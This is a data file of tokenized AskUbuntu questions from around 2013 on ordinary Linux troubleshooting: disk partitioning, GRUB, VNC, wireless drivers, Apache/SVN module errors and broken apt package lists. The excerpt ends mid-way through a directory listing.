390104	linux driver for > 2tb drives that are already formatted by windows discwizard ?	i have a 3tb seagate internal drive that i 've been using on windows for a while . my pc does n't have uefi , and i needed to boot windows from the seagate drive , so i could n't format it as gpt ( windows does n't allow booting from a gpt disk with a legacy bios ) . the only way to see all 3tb was to use seagate 's discwizard utility . please note that although discwizard also has backup functions , my only use for it was the driver it installs that makes a 3tb drive look like two separate drives , one of 2tb and one of about 800gb . this question has nothing to do with backup . i just installed ubuntu 13.10 today , on a different drive . i 'm not using any kind of dual boot scheme , i just pick which drive to boot from with the bios . when i 'm in ubuntu , i can see the 2tb portion of the seagate drive , but not the 800gb part . i went to the seagate website to see if they had a linux version of discwizard , but apparently they do n't . the drive is almost full , so i really , really do n't want to reformat it . so my question is , is there any driver for ubuntu that will allow me to see the last 800gb of my data , without forcing me to back up all 3tb and reformat it ? thank you .
390106	can i install ubuntu on htc butterfly ?	after using ubuntu on pc , i also wanted to try on my `` htc butterfly '' . but not dare to tried out what will happen or my data ( android os ) can be restore back or somethings else . so surfing on google for information but only other htc devices ( like htc desire hd , htc sensation , etc ) are show that can install ubuntu . if i can , i also want to dual boot on my android phone like pc ! i want more and detail information about `` install ubuntu on htc butterfly '' can be or can not . can someone show me how exactly work ?
390110	libre office base list box	i have 4 tables setup . this is for a course of mine and is an example dbms . tables : fields categories : categoryid , categoryname , categorydescription customers : customerid , firstname , lastname , phonenumber , address media : mediaid , mediacategoryid , mediatitle , mediadescription rentals : customerid , mediaid , rentaldate , duedate in the one form i am trying to add data to the rentals table , a list box which lists , customers table : field `` firstname lastname '' and then places the corresponding customerid into the rentals table : field customerid . same thing with the mediaid , a list box which pulls media table : field medianame and places the mediaid into the rentals table : field mediaid . i also want it to automaticly put the current date into the rentaldate field , and the current date + 7 days to the duedate field . how do i go about doing this ?
390111	can not install grub for dual boot ubuntu 13.10 and windows 7	my pc already has windows 7 and i installed ubuntu on a different partition because during the installation of ubuntu i was not getting the option `` to install ubuntu side-by-side '' . therefore , i installed it on a different partition and the installation was successful . anyways , after installing ubuntu , i do not get the boot option as it directly boots me into the windows 7 os . i googled the problem and it seemed that i had to use the ubuntu live cd and install boot-repair , therefore , i installed boot-repair on and when i run the recommended-repair option i get the message `` please enable a repository containing the [ grub2 ] packages in the software sources of ubuntu 13.10 ( sda6 ) . then try again . '' i am also attaching the link for boot summary information http : //paste.ubuntu.com/6565132/ thanks in advance .
390113	x11vnc much slower than xvnc + how to get a xubuntu session manually	i 'm running xubuntu 12.04 on a headless server inside a vmware virtual machine . i 'd prefer using x11vnc over xvnc in order to use lightdm and the x server started by lightdm ( and login using xubuntu-session rather than xfce4 ) . the problem is that x11vnc is much slower than xvnc ( both vnc4server and tightvncserver flavours ) . i 'm on a low speed broadband connection and , e.g . dragging windows is visibly slower on x11vnc , about 3-4 times slower i 'd say . i 'm forcing 16 bit and 1280x800 on both x11vnc and xvnc , but i 'm not sure x11vnc is actually using 16bpp ( see logs below ) . x11vnc i start x11vnc with a start script in /etc/init/x11vnc : start on login-session-start script x11vnc -xkb -noxrecord -noxfixes -noxdamage -display :0 \ -auth /var/run/lightdm/root/:0 -forever -shared -bg \ -o /var/log/x11vnc.log -rfbport 5901 -localhost -nopw -xrandr end script by default , this will start in 800x600 with 32bpp , which can not be changed via command line parameters . i had to do : apt-get install xserver-xorg-video-dummy and then create /etc/x11/xorg.conf ( which did not exist by default ) with the contents : section `` device '' identifier `` configured video device '' driver `` dummy '' endsection section `` monitor '' identifier `` configured monitor '' horizsync 31.5-48.5 vertrefresh 50-70 endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' defaultdepth 16 subsection `` display '' depth 16 modes `` 1280x800 '' endsubsection endsection when connecting to it , /var/log/x11vnc.log says : 30/11/2013 07:12:32 pixel format for client 127.0.0.1 : 30/11/2013 07:12:32 16 bpp , depth 16 , little endian 30/11/2013 07:12:32 true colour : max r 31 g 63 b 31 , shift r 11 g 5 b 0 30/11/2013 07:12:32 no translation needed note the true color part . also , there is still transparency in the lower panel when using 16bpp in x11vnc , whereas when using `` -depth 16 '' with xvnc , all transparent panels have solid color and the `` alpha '' option in the panel configuration is gone . this makes me think that xfce still detects a 32bit display when using x11vnc , which may be a cause for slowness . i also tried xserver-command=x -depth 16 in /etc/lightdm/lightdm.conf , but did n't make any difference . xvnc i did : apt-get install vnc4server vncserver :1 -depth 16 -geometry 1280x800 this starts a new x session , depending on what i have in ~/.vnc/startup , which is : # ! /bin/sh [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & # x-window-manager & startxfce4 & there is no wireframe by default . dragging windows shows the full window , not just a border , and it 's still visibly faster than x11vnc which is showing only a wire frame when dragging windows ! same goes if i replace vnc4server with tightvncserver . any clues on how to make x11vnc just as fast ? it must be capable somehow ! i tried all sort of options to x11vnc ( from all thos -nox* -nowireframe , etc ) to no avail . alternatively , i could stop lightdm and start xvnc with the ~/.vnc/xstartup so that it starts the same xubuntu session as it does from lilghtdm login screen , rather than xfce4 session ... but i do n't know how . i did replace startxfce4 with /etc/x11/xsession but it does not look the same . the fonts are smaller and there are artefacts . any help would be appreciated !
390115	ubuntu 12.04 lts not detect wireless on lenovo ideapad q190	hey everyone im new to linux anda after some googling i decided to install ubuntu , my first ubuntu to install is ! 2.04 lts i 'm choosing this because of long term service but the problem is ubuntu not detect my wireless , i try update ( using lan ) from software updater , nothing happen then i 'm trying additional driver , but nothing show up . should i un-install it and go to ubuntu 13.10 ?
390119	3tb hdd and legacy bios	i have new 3tb hdd and motherboard with legacy bios . to take advantage of full hdd capacity i have to use gpt partition table . i want to dual-boot windows 8.1 and ubuntu 13.10 ( 64-bit ) from this hdd . from what i find out for now ( from askubuntu and my own tests ) is that ubuntu can support gpt partition table even without uefi on motherboard while windows 8.1 needs uefi to do that . will ubuntu 13.10 in fact boot from hdd with gpt partition table when only legacy bios is available ? if ubuntu can boot that way , what is stopping windows from doing so ? i know that answer for that question might be outside of the scope of askubuntu , but it might give full picture . in other words - how is ubuntu superior to windows that it can boot from gpt-partitioned hdd even with only legacy bios available ? is there any way to dual-boot windows and ubuntu from 3tb hdd in a way that at least lets ubuntu use full capacity while leaving windows with less space ?
390122	unable to connect or detect internet single from our router	i have just installed ubuntu on my wife 's hp and for some reason the wireless is not picking up our internet provided by our building . what can i do ? before we installed ubuntu we could read our building 's internet , now all we are picking up is a personal internet .
390125	'aticonfig : no supported adapter detected ' while installing drivers	i have three sapphire 290x 's . and i have downloaded/installed the drivers . the machine even prompted me to reboot . but after the reboot when i went to check for my graphics cards , it read : aticonfig : no supported adapter detected
390127	burning a dvd disc	if i download ubuntu o.s . and burn a dvd on my windows 7 64 bit machine , will that dvd install on my older laptop ? windows xp 32 bit . thanks , gary .
390131	unbuntu install sgs3	maybe this question was asked a thousand times . but i 'm abolute not informed about installing operating system . i would like to install unbuntu on my samsung galaxy s3 without lossing the fotos and the contacts . is there a very easy and simple manuel how i can do that ? im glad for every answer . cheese !
390134	low sound volume with asus motherboard ( realtek )	i 'm using ubuntu 13.10 . i have recently assembled a pc , using the asus p8z77-v lx motherboard , and it 's working very well so far . the only problem is that the sound coming from the motherboard plugs is really low and i ca n't get it higher . if i go over 100 % volume on gnome-control-center the sound gets distorted . i tried to change settings in alsamixer , too , but nothing changed so far . i 've read about realtek drivers , but i 've read that they just screw up alsa , resulting in no sound . i called asus customer support , they told me that they ca n't give me software support anyway , so i 'm asking here now . how to solve this ? if you need any more info , just ask . edit : alsa-info output : http : //pastebin.com/s8shmnsz
390135	installing ubuntu 13.10 in my laptop alarady having windows 8.1 os	model no toshiba - l850-b750 os - windows 8.1 single language ram 6 gb 2 gb grafics card 64 bit operating system
390138	how do you change the amount of time before the screen dims ?	as a video watcher , i get rather agitated when my screen dims and then turns off while i am watching something . i do not want to be interrupted every 10 minutes or so and have to move the mouse . i want to make it a more convenient amount of time like an hour or so . how would i go about doing this . windows user , linux lover .
390146	usb hardware disappears	i 'm just going to use this for an example . i have a western digital passport , external hard drive . i plug it into the usb port on my computer , it shows up immediately , i go through and browse , and move files back and forth , no problem . a few hour later and i go to move some more files over , and it has disappeared from the connected hardware list . for example , when you go to the `` computer '' link that takes you to the page with all the storage media , ie..hard drives/cd/dvd drives , it is just no longer there . i have to unplug and replug so it will show up again . it 's fine for another few hours , or sometimes a few days , then it disappears again , starting the process over again . why does hardware plugged into the usb ports disappear like that ? it 's not just the hard drive , my printer , and an external dvd drive i have also do the same thing . i 've had this happen to windows machines , different computers than i have now . so this problem is multiple os 's , and multiple machines , can anyone tell me why this happens ?
390147	how to change the mac address of pc ?	i am currently using ubuntu 13.04 along with windows 7 . but i want to change my mac address of pc . is there any way to change it .
390149	can not re-install mysql `` can not access `/var/lib/mysql/ ... /memory88 ' : no such file or directory ''	ubuntu server 12.04 full error : can not access `/var/lib/mysql/dev/fd/4/sys/bus/cpu/devices/cpu0/node0/memory96/subsystem/devices/memory88 ' : no such file or directory after trying to install : sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql mysql was full because i was trying to import a very large .sql file , i thought purging mysql would fix the issue , so i searched and found this sudo apt-get purge mysql-server-5.1 mysql-common how can i fix this issue ?
390150	controlling the fans on asus ux31a	i have a problem with the fan of my asus ux31a . it turns on and off every few seconds even when i 'm doing nothing , which can be very annoying after some time . i found a rough 'hack ' ( http : //pastebin.com/nrmfm109 ) , which works very fine , but the author does n't recommend it in every day use . after searching another while i found this module : https : //gist.github.com/felipec/6169047 . i modprobed it and it is listed in lsmod , but how can i now control the fans with it ? in windows there is a tool called notebookfancontroll , which works very fine . but i do n't want to use windows : ) , so i hope someone can help me . sincerely dizzy
390151	architecture specific debian package	i have created debian package xyz . it has control file which look 's like package : xyz version : 1.0 section : kernel priority : optional architecture : i386 depends : installed-size : 1024 i just have a question , when i build this package on some machine it say 's dpkg-deb : building package xyz : i386 . but when i build same package on some other machine it says dpkg-deb : building package xyz . why this difference ? on deinstallation i am facing same issue the package which was build with name xyz : i386 requires dpkg -r xyz : i386 to uninstall it .why ? cant we just say dpkg -r xyz ?
390152	how do i make wireless bridged networking work with linux guest in kvm/qemu ?	i am running the ubuntu 13.10 cloud image on kvm/qemu . the guest networking works fine operating in nat mode when on wireless . wired bridged networking ( eth0 + macvtap ) works fine as well . when running wireless bridged networking ( wlan0 + macvtap ) , guest boot gets stuck at `` remounted . opts : ( null ) '' . on the other hand , wireless bridged networking works fine with virtualbox , so i assume this is no fundamental problem which can not be solved . what is the missing part to get wireless bridged networking to work on kvm/qemu ?
390157	can assembly directives corrupt my ubuntu ?	i want to start learning assembly language , and read some stuff about it . from a first impression , it seems like the assembler pretty much gives you freedom to do whatever you want with your registers , including full freedom to access and overrun ram memory as you wish . now , to my best understanding , the windows os will prevent any unauthorized memory access , but will ubuntu also prevent me from screwing up ? if not , how can i practice assembly safely ?
390160	internal error in ubuntu 12.04 that asks to run package manager	i have been using ubuntu 12.04 on my acer aspire one for some months , but it has been showing me an error message since 3 days . the error message appears as a red circle with a white hyphen in the middle of it , it reads : an error occured , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : error : opening the cache ( e : encountered a section with no package header e : problem with mergelist /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_i18n_translation-en e : the package lists or status file could not be parsed or opened . ) this usually means that your installed packages have unmet dependencies please help . i am not able to access the net since today morning . i do n't know if it 's because of this problem or something else . i tried doing this package manager troubleshooting procedure but the problem is that it gives two different strategies one for people connecting through a proxy server and the other for those connecting without it.i am not using a proxy server so i used those instructions , however the terminal that an old proxy is still not deactivated.how do i deal with this ? how should i remove that proxy , it was a manual proxy that i used at an institution around 6 months ago .
390163	how do i migrate from windows 2003 ad ?	i am planning to migrate our windows server 2003 ad to an ubuntu ad server . first of all , i need to know whether it is possible . if it is , what is the recommended stabilized stack and how do i do it ?
390165	rtl8188ce - ubuntu 13.04	i am running `` zorin os 7 core '' on my laptop , which is based on ubuntu 13.04 . i have a problem with my rtl8188ce wifi card . it says `` wireless is disabled by hardware switch '' , but i already installed this driver correctly . i did it the same way i had done it on 12.04 , and it worked . the crazy thing is when i type : rfkill list all it says : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no _ rfkill unblock all didn’t help ... i don’t know why it shows me 2 wifi devices and why i ca n't unblock the phy0 does anyone have an idea ? my notebook specs are : manufacturer : asus modell : f75vb-ty041h prozessor : intel core i5-3230m ( 3 . gen ) graphic : intel hd 4000 / nvidia geforce gt 740m wlan : realtek rtl8188ce wlan adapter audio : realtek audio alc269 bios : v. 304
390166	what is kworker and why is it using almost 100 % of the first cou core ?	i know this question is asked several times , but i do n't find a solution ( if there is any ) i have a samsung series 7 chronos laptop . cpu - intel® core™ i7-3635qm cpu @ 2.40ghz × 8 i 'm on ubuntu 13.10 64 bit
390167	how to clear text in a file ?	how to clear text that existed in a text file with out opening it ? i mean for example i have a file as hello.txt with some text data in it & how can i clear the total text in that file with out opening it .
390169	is there any way i can run linux commands in the web ?	i am looking for software/application that can help me of checking some linux commands working in a browser irrespective of os . i mean live cli in the browser . thank you .
390174	ca n't start apache2.4 after upgrading subversion to 1.8.5	system : ubuntu 13.10 i ca n't start apache2 after i upgraded svn to 1.8.5 [ wandisco ] yesterday . the error i get $ sudo service apache2 start * starting web server apache2 * * the apache2 configtest failed . output of config test was : apache2 : syntax error on line 142 of /etc/apache2/apache2.conf : syntax error on line 2 of /etc/apache2/mods-enabled/authz_svn.load : can not load /usr/lib/apache2/modules/mod_authz_svn.so into server : libsvn_repos-1.so.1 : can not open shared object file : no such file or directory action 'configtest ' failed . the apache error log may have more information . [ there is no additional info in apache log ] i tried this : http : //ubuntuforums.org/archive/index.php/t-1777292.html $ locate mod_dav_svn.so /usr/lib/apache2/modules/mod_dav_svn.so so i changed my /etc/apache2/mods-enabled/authz_svn.load to : # depends : dav_svn # loadmodule authz_svn_module /usr/lib/apache2/modules/mod_authz_svn.so loadmodule authz_svn_module /usr/lib/apache2/modules/mod_dav_svn.so but i 'm still getting the same error , just with path to the module changed . $ sudo service apache2 start * starting web server apache2 * * the apache2 configtest failed . output of config test was : apache2 : syntax error on line 142 of /etc/apache2/apache2.conf : syntax error on line 3 of /etc/apache2/mods-enabled/authz_svn.load : can not load /usr/lib/apache2/modules/mod_dav_svn.so into server : libsvn_repos-1.so.1 : can not open shared object file : no such file or directory action 'configtest ' failed . the apache error log may have more information . the strangest thing is that both files exist and are readable $ ls -la /usr/lib/apache2/modules/mod_authz_svn.so -rw-r -- r -- 1 root root 18872 paź 15 16:03 /usr/lib/apache2/modules/mod_authz_svn.so $ ls -la /usr/lib/apache2/modules/mod_dav_svn.so -rw-r -- r -- 1 root root 173224 paź 15 16:03 /usr/lib/apache2/modules/mod_dav_svn.so info about my svn : $ svn -- version svn , version 1.8.5 ( r1542147 ) compiled nov 19 2013 , 15:29:58 on x86_64-unknown-linux-gnu copyright ( c ) 2013 the apache software foundation . this software consists of contributions made by many people ; see the notice file for more information . subversion is open source software , see http : //subversion.apache.org/ są dostępne następujące moduły dostępu do repozytorium ( ra ) : * ra_svn : moduł umożliwiający dostęp do repozytorium przy pomocy protokołu svn . - z uwierzytelnianiem cyrus sasl - obsługuje protokół 'svn' * ra_local : moduł umożliwiający dostęp do repozytorium na lokalnym dysku . - obsługuje protokół 'file' * ra_serf : module for accessing a repository via webdav protocol using serf . - using serf 1.3.2 - obsługuje protokół 'http' - obsługuje protokół 'https' i 'm out of ideas . i will be grateful for your help . update i downgradeg svn to 1.7.9 - now it works .
390175	xubuntu excessive memory consumption	free -m total used free shared buffers cached mem : 7917 7011 906 0 124 609 -/+ buffers/cache : 6276 1640 swap : 8122 3770 4352 i have xubuntu running on an hp elitebook i5 with 8gb or ram . uname -a = linux hp-elitebook-8470p 3.5.0-37-generic # 58~precise1-ubuntu smp wed jul 10 17:48:11 utc 2013 x86_64 x86_64 x86_64 gnu/linux normally i have to run vagrant ( virtual box ) , firefox ( 15 to 20 tabs ) and netbeans . vagrant normally takes 1gb , firefox almost takes on 1gb and it 's the same for netbeans . this still does n't explain why my free memory is so low . i open htop and i see multiple instances of x anyone know what the problem might be ?
390176	google chrome and askubuntu	i 'm having a strange problem since the new installation of ubuntu 13.10 x64 . here is a screenshot as you see my badge icons are not loading and vote buttons are messed ( i have n't even touched them-up voted or down voted ) this is only with google-chrome ( firefox and other browsers are good ) and with askubuntu site only ... other stack exchange sites render as normal ... why is this ? does askubuntu site has some kind of interfere with google-chrome ? i reinstalled google-chrome but the problem exists ... ubuntu 13.10 x64 google-chrome-version 31.0.1650.63
390181	microsoft comfort desktop 5000 media keys	after spending a fair bit of money on my new microsoft comfort 5000 desktop , some of the media keys and the window switch key does not work . the favourites and the zoom being some of them . please help ! ! !
390183	installing groovenet simulator i got this error	the groovenet simulator has been tested on ubuntu 12.04 . this is qt3 osm map beta version . first , make sure you have installed qt3 platform and g++ compiler . it works fine for g++ with 4.4.5 or above . to install qt3 : type sudo apt-get install qt3-dev-tools in the terminal to install g++ : type sudo apt-get install g++ in the terminal then please go to https : //github.com/mlab/groovenet please click 'download ' to download the groovenet simulator . navigate to your download folder and untar ( or unzip ) the package . you may use tar -xzvf 'file name' cd into your extracted folder - > project/src type make clean type make to build and install groovenet . if there are no errors , cd into bin folder after did these steps i got this error : /usr/bin/ld : can not find -lpcap collect2 : ld returned 1 exit status make : *** [ ../bin/groovenet ] error 1 how to rectify this issue ? we need your help ! asap !
390186	black dashes when scrolling on webpages . firefox 13.10	on firefox with ubuntu 13.10 , and cinnamon desktop i get dashes appearing on webpages when i scroll . see screenshot : any ideas about what this is and how to get rid of it would be appreciated . it does n't happen every time i open a webpage , only sometimes .
390190	install ubuntu touch as 2nd rom gt-i9300	i 'm trying to install ubuntu touch on my galaxy s3 with the siyah s3 1.9.1 kernel . but once i 've installed it and want to run ubuntu , i just get a black screen . or it wo n't get past the siyah start screen . does anyone know how i can fix it ? ?
390193	how to prevent a window from overlapping multiple workspaces	i 'm using ubuntu 13.10 64-bit with gnome 3.8.4 and would like to prevent a window from overlapping from one workspace to another . i have performed every google search i can think of and the closest thing i have found was the ccsm tool to edit window snapping . however the most resent post i found on this was from 2012 . i was hoping there might have been a fix within the past year . does anyone know of a new development with this , or why gnome would not put an option for this behavior in the settings ? ! i am unable to post an image due to low repuation . most of my questions are usually answered so i do n't end up posting much . here is a link to another question with an image of what i am talking about . i want the window to disappear beyond the edge of the workspace it is on , not carry over to the next workspace .
390194	upgrade an old `` kinda '' broken ubuntu from a working lubuntu	i 've been searching for this but i couldnt find an answer . ( to state that i did search ) is it possible to update my ubuntu 11.04 from my current lubuntu 13.10 ? i have and `` old '' pc . specs are : cpu : amd athlon xp @ 1.9 vga : ati radeon 9200 agp 8x ram : 1 gb module - 1 module for 256 mb total : 1,25gb motherboard : a7v8x-mx se a few years ago i installed ubuntu 10.04 , put a lot of important files there , and kinda `` never used it again '' , i just used ubuntu once or twice in a year , when searching for old stuff . my ubuntu was working fine , but i couldnt upload videos to youtube anymore . firefox just freeze and chrome crashes . so i uninstaled chrome and i couldnt install it back , because my version was not supported anymore . so i started upgrading ( it was quite difficult because im a begginer ) and i managed to upgrade to 11.04. when trying to upgrade to 11.10 , linux wont let me log in , the clock on the login screen works , but i cant move the mouse , cant use the keyboard and cant enter a terminal ( with alt + f2 ) i read that it wont load up my video card drivers or maybe its the mouse and keyboard . entering text mode allows me to perform console commands such as `` sudo upgrade '' , but since the list file is `` broken '' and i have to replace some lines to the `` old-repository '' it wont upgrade anymore , it will never find the files required . i tried to install 12.04 but the install fails ( like its some hardware problem ) . tired of reading , i find that the problem is my old video card , so i moved into a `` light '' version of linux and here i am , it works just fine , even faster i think . im in lubuntu 13.10 and i love it , but i cant use the flash player , only a few sites allow me to use the flash , i try with chrome and cant even run the chrome browser . so im ok with that , but , is it possible to update my ubuntu 11.04 from my current lubuntu 13.10 ? 11.04 ubuntu has 65 gb in a 80 gb ide hdd so im afraid that i might run out of space soon in this 15gb filesystem . the files i had are ok , i can access all of them from here , i just cant use flash .
390200	updates require authentication	my update manager in ubuntu 12.04 pops up this message while installing updates : 'requires installation of untrusted packages . the action would require the installation of packages from not authenticated sources ' . in details : 'gnome-control-center gnome-control-center -data libgnome-control-center' how to solve the problem ? thankyou . : )
390201	how to see login history ?	is it possible to see the login history , i mean to see if someone has used the computer in my absence and when he used it . if it is possible , where can i get the log ? if not , is there a program that logs all the logins and their time ?
390206	`` a plugin is required '' but i have already installed it from software center	every time i play games , i see that a plugin is required , but i have already installed `` flash '' from software center . and also , i am able to see youtube videos but still this is only happening in firefox .
390208	toshiba c850d-107 wireless issues on 12	ever since i installed ubuntu , my laptop seems to freak out , whenever i want to connect to a wireless network . this problem occurred in both 12.04 and 12.10. its like i need a solution can not connet to wireless $ lspci | grep network 06:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 )
390211	how to remove winthumbnails gnome extension	i have just installed winthumbnails extension and unlike other extensions it ca n't be uninstalled via https : //extensions.gnome.org/ . is there some other way to uninstall because it really bothers me because it is inactive and just staying there occupying space .
390213	does linux have a signature system for executables ?	windows has a signature system which allows you to make sure that an executable has n't been modified after it has been signed . i used to use this as a security measure in windows . does linux have such a system which allows developers to put signatures in executables and .debs so that the user can verify them ? so , for example some one gives me a modified version of a program . i can see if the programs signature is valid or if it has a signature in the first place .
390214	apt-get install problem in ubuntu	accidently deleted the whole /var/lib/apt/lists fetched 496 kb in 50s ( 9,738 b/s ) reading package lists ... error ! e : read error - read ( 21 : is a directory ) e : the package lists or status file could not be parsed or opened . is there any way to resolve this error root @ aravinth : ~ # ls -l /var/lib/dpkg/ /var/lib/apt/lists/ /var/lib/apt/lists/ : total 150320 -rw-r -- r -- 1 root root 5425 dec 11 23:38 archive.canonical.com_ubuntu_dists_saucy_partner_binary-amd64_packages -rw-r -- r -- 1 root root 7072 dec 11 23:38 archive.canonical.com_ubuntu_dists_saucy_release -rw-r -- r -- 1 root root 933 dec 11 23:38 archive.canonical.com_ubuntu_dists_saucy_release.gpg -rw-r -- r -- 1 root root 82659 nov 25 04:18 archive.cloudera.com_cdh4_ubuntu_precise_amd64_cdh_dists_precise- cdh4_contrib_binary-amd64_packages -rw-r -- r -- 1 root root 25377 nov 25 04:18 archive.cloudera.com_cdh4_ubuntu_precise_amd64_cdh_dists_precise- cdh4_contrib_source_sources -rw-r -- r -- 1 root root 1927 nov 25 04:18 archive.cloudera.com_cdh4_ubuntu_precise_amd64_cdh_dists_precise-cdh4_inrelease -rw-r -- r -- 1 root root 7082166 apr 25 2013 archive.ubuntu.com_ubuntu_dists_raring_main_binary-amd64_packages -rw-r -- r -- 1 root root 3615768 apr 23 2013 archive.ubuntu.com_ubuntu_dists_raring_main_i18n_translation-en -rw-r -- r -- 1 root root 647785 apr 25 2013 archive.ubuntu.com_ubuntu_dists_raring_multiverse_binary-amd64_packages -rw-r -- r -- 1 root root 394791 apr 22 2013 archive.ubuntu.com_ubuntu_dists_raring_multiverse_i18n_translation-en -rw-r -- r -- 1 root root 40778 apr 25 2013 archive.ubuntu.com_ubuntu_dists_raring_release -rw-r -- r -- 1 root root 933 apr 25 2013 archive.ubuntu.com_ubuntu_dists_raring_release.gpg -rw-r -- r -- 1 root root 153454 apr 25 2013 archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-amd64_packages -rw-r -- r -- 1 root root 13233 apr 19 2013 archive.ubuntu.com_ubuntu_dists_raring_restricted_i18n_translation-en -rw-r -- r -- 1 root root 29085587 apr 25 2013 archive.ubuntu.com_ubuntu_dists_raring_universe_binary-amd64_packages -rw-r -- r -- 1 root root 16871423 apr 25 2013 archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en -rw-r -- r -- 1 root root 0 may 1 2013 extras.ubuntu.com_ubuntu_dists_saucy_main_binary-amd64_packages -rw-r -- r -- 1 root root 0 may 1 2013 extras.ubuntu.com_ubuntu_dists_saucy_main_source_sources -rw-r -- r -- 1 root root 9753 may 1 2013 extras.ubuntu.com_ubuntu_dists_saucy_release -rw-r -- r -- 1 root root 72 dec 13 13:31 extras.ubuntu.com_ubuntu_dists_saucy_release.gpg -rw-r -- r -- 1 root root 0 nov 16 01:18 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_main_binary-amd64_packages -rw-r -- r -- 1 root root 0 apr 25 2013 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_main_i18n_translation-en -rw-r -- r -- 1 root root 0 nov 16 01:19 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_main_source_sources -rw-r -- r -- 1 root root 0 nov 16 01:18 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_multiverse_binary-amd64_packages -rw-r -- r -- 1 root root 816 nov 7 02:44 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_multiverse_i18n_translation-en -rw-r -- r -- 1 root root 1466 nov 16 01:19 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_multiverse_source_sources -rw-r -- r -- 1 root root 49615 nov 16 01:19 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_release -rw-r -- r -- 1 root root 933 nov 16 01:19 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_release.gpg -rw-r -- r -- 1 root root 0 nov 16 01:18 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_restricted_binary-amd64_packages -rw-r -- r -- 1 root root 0 apr 25 2013i n.archive.ubuntu.com_ubuntu_dists_saucy-backports_restricted_i18n_translation-en -rw-r -- r -- 1 root root 0 nov 16 01:19 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_restricted_source_sources -rw-r -- r -- 1 root root 803 nov 16 01:18 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_universe_binary-amd64_packages -rw-r -- r -- 1 root root 992 nov 16 01:11 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_universe_i18n_translation-en -rw-r -- r -- 1 root root 1403 nov 16 01:19 in.archive.ubuntu.com_ubuntu_dists_saucy-backports_universe_source_sources -rw-r -- r -- 1 root root 7483055 oct 17 18:06 in.archive.ubuntu.com_ubuntu_dists_saucy_main_binary-amd64_packages -rw-r -- r -- 1 root root 3818658 oct 17 05:10 in.archive.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en -rw-r -- r -- 1 root root 4626740 oct 17 18:08 in.archive.ubuntu.com_ubuntu_dists_saucy_main_source_sources -rw-r -- r -- 1 root root 655674 oct 17 18:06 in.archive.ubuntu.com_ubuntu_dists_saucy_multiverse_binary-amd64_packages -rw-r -- r -- 1 root root 404348 oct 15 22:16 in.archive.ubuntu.com_ubuntu_dists_saucy_multiverse_i18n_translation-en -rw-r -- r -- 1 root root 713781 oct 17 18:12 in.archive.ubuntu.com_ubuntu_dists_saucy_multiverse_source_sources -rw-r -- r -- 1 root root 49557 oct 17 18:12 in.archive.ubuntu.com_ubuntu_dists_saucy_release -rw-r -- r -- 1 root root 933 oct 17 18:12 in.archive.ubuntu.com_ubuntu_dists_saucy_release.gpg -rw-r -- r -- 1 root root 139874 oct 17 18:06 in.archive.ubuntu.com_ubuntu_dists_saucy_restricted_binary-amd64_packages -rw-r -- r -- 1 root root 14624 oct 17 04:55 in.archive.ubuntu.com_ubuntu_dists_saucy_restricted_i18n_translation-en -rw-r -- r -- 1 root root 18029 oct 17 18:08 in.archive.ubuntu.com_ubuntu_dists_saucy_restricted_source_sources -rw-r -- r -- 1 root root 30496103 oct 17 18:06 in.archive.ubuntu.com_ubuntu_dists_saucy_universe_binary-amd64_packages -rw-r -- r -- 1 root root 17629289 oct 17 07:05 in.archive.ubuntu.com_ubuntu_dists_saucy_universe_i18n_translation-en -rw-r -- r -- 1 root root 26368945 oct 17 18:12 in.archive.ubuntu.com_ubuntu_dists_saucy_universe_source_sources -rw-r -- r -- 1 root root 1025646 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_main_binary-amd64_packages -rw-r -- r -- 1 root root 508094 dec 13 02:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_main_i18n_translation-en -rw-r -- r -- 1 root root 256152 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_main_source_sources -rw-r -- r -- 1 root root 3030 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_multiverse_binary-amd64_packages -rw-r -- r -- 1 root root 1370 nov 20 04:49 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_multiverse_i18n_translation-en -rw-r -- r -- 1 root root 3018 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_multiverse_source_sources -rw-r -- r -- 1 root root 49567 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_release -rw-r -- r -- 1 root root 933 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_release.gpg -rw-r -- r -- 1 root root 0 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_restricted_binary-amd64_packages -rw-r -- r -- 1 root root 0 apr 25 2013 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_restricted_i18n_translation-en -rw-r -- r -- 1 root root 0 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_restricted_source_sources -rw-r -- r -- 1 root root 365742 dec 13 18:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_universe_binary-amd64_packages -rw-r -- r -- 1 root root 184100 dec 13 02:05 in.archive.ubuntu.com_ubuntu_dists_saucy-updates_universe_i18n_translation-en -rw-r -- r -- 1 root root 76410 dec 13 18:05 